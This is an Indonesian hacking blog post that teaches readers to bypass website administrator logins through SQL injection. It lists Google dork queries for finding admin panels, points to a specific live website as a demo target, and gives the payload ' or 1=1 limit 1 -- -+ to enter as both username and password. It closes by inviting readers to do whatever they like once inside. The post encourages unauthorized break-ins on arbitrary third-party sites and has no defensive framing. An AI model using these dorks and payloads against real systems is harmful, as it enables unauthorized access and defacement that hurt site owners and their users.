Monday, March 31, 2014
Home » Deface » Hacking » SQL Injection » ByPass SQL Login
11:51 PM
2 comments

ByPass SQL Login

Assalamuallaikum Wr Wb.. :)
Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan error pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin.
Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel

inurl:/admin2/ ext:php

inurk:/admin/ ext:php

inurl:/adminpanel/ ext:php

inurl:/admin_panel/


[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

    http://preprojects.com/hostfriendz/int/index.php

2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

"I love Watanabe Mayu ( Mayuyu - AKB48 ) :) :*

Editor : ./V404
Source : IDCA
Posted by at 11:51 PM
Labels: , ,
Share:

2 comments:

Subscribe to: Post Comments (Atom)